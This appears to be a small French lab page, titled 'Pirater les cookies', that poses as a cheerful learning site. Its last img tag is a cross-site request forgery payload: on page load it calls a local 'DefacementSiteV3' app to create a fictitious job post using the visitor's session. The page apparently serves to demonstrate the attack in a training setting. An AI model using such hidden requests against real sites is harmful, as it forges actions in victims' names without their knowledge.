<!DOCTYPE html>
<html>
    <head>
        <title>Pirater les cookies</title>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
    </head>
    <body>
        <h1>Site pour les optimiste</h1>
        <h2>Apprendre Java en deux Jours sans effort</h2>
        <h2>Tout sur le développement en s'amusant</h2>
        <h2>Toujours plus fort sans effort</h2>
        <img  src="fond.jpg" alt=""/>
        <img src="http://localhost:8080/DefacementSiteV3/creerEmploi.jsp?description=emploi fictif" alt='' />
    </body>
</html>